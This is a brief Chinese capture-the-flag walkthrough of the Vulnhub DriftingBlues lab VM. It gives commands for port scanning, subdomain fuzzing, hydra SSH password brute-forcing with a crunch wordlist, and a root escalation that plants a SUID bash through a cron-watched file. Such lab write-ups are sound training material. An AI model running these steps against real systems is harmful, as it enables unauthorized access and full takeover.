kali:192.168.111.111
靶机:192.168.111.215
信息收集
端口扫描
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.215
80端口首页源码
访问noteforkingfish.txt
,发现为Ook!加密的密文
解密后提示需要用户eric
和修改hosts文件,解密网站:https://www.splitbrain.org/services/ook
网站首页中的邮件地址的域名:driftingblues.box
爆破子域名
wfuzz -H 'HOST: FUZZ.driftingblues.box' -u http://192.168.111.215 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hh 7710 --hc 400 -c
查看子域的robots.txt
提示ssh_cred.txt
ssh密码为1mw4ckyyucky
最后加一位数字
生成密码字典
crunch 13 13 -t 1mw4ckyyucky% >> pass.txt
利用之前提示的用户eric
爆破ssh
hydra -l eric -P ./pass.txt 192.168.111.215 -s 22 ssh -t 64
提权
pspy64收集到定时任务
/var/backups/backup.sh
内容
在/tmp目录下创建emergency文件
echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' >> /tmp/emergency
chmod 777 emergency
/tmp/bash -p
flag
标签:tmp,111.215,DriftingBlues,192.168,Vulnhub,靶机,txt,bash,ssh From: https://www.cnblogs.com/ctostm/p/17657772.html